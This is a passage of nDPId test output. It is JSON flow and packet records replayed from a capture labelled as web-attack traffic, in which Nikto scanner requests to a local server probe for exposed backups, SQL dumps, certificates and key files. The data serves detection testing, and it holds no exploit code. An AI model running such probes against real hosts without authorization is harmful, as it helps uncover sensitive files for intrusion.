{"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277315,"pkt":"AAAAAAAAAAAAAAAACABFAADC35NAAEAGXKB\/AAABfwAAAcS2H5BI6+ciGxVy6IAYAED+tgAAAQEICp1m\/WudZv1rR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277317,"pkt":"AAAAAAAAAAAAAAAACABFAADCBO9AAEAGN0V\/AAABfwAAAcS4H5BQkTxdjeN4aIAYAED+tgAAAQEICp1m\/W2dZv1tR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277317,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277319,"pkt":"AAAAAAAAAAAAAAAACABFAADAyGZAAEAGc89\/AAABfwAAAcS6H5BukfDWpxxv14AYAED+tAAAAQEICp1m\/W+dZv1vR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277319,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277321,"pkt":"AAAAAAAAAAAAAAAACABFAADAwiFAAEAGehR\/AAABfwAAAcS8H5DDVvqu6KD2KYAYAED+tAAAAQEICp1m\/XGdZv1xR0VUIC9zaXRlLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277321,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277322,"pkt":"AAAAAAAAAAAAAAAACABFAADBuGlAAEAGg8t\/AAABfwAAAcS+H5BzjYDWLFz9IYAYAED+tQAAAQEICp1m\/XKdZv1yR0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":411,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277322,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277324,"pkt":"AAAAAAAAAAAAAAAACABFAADB11JAAEAGZOJ\/AAABfwAAAcTAH5DtMO\/kM\/E\/tYAYAED+tQAAAQEICp1m\/XSdZv10R0VUIC8xMjcuMC5jZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277325,"pkt":"AAAAAAAAAAAAAAAACABFAAC96FRAAEAGU+R\/AAABfwAAAcTCH5AdeNDi26Tri4AYAED+sQAAAQEICp1m\/XWdZv11R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277326,"pkt":"AAAAAAAAAAAAAAAACABFAAC95+5AAEAGVEp\/AAABfwAAAcTEH5Cz199gOp5CH4AYAED+sQAAAQEICp1m\/XadZv12R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277328,"pkt":"AAAAAAAAAAAAAAAACABFAADAqSFAAEAGkxR\/AAABfwAAAcTGH5DtDpGsIyeJWoAYAED+tAAAAQEICp1m\/XidZv14R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277329,"pkt":"AAAAAAAAAAAAAAAACABFAADA2JJAAEAGY6N\/AAABfwAAAcTIH5BNx+AlanMTuoAYAED+tAAAAQEICp1m\/XmdZv15R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277331,"pkt":"AAAAAAAAAAAAAAAACABFAADHC9ZAAEAGMFl\/AAABfwAAAcTKH5CiFTNhL7Iog4AYAED+uwAAAQEICp1m\/XqdZv16R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 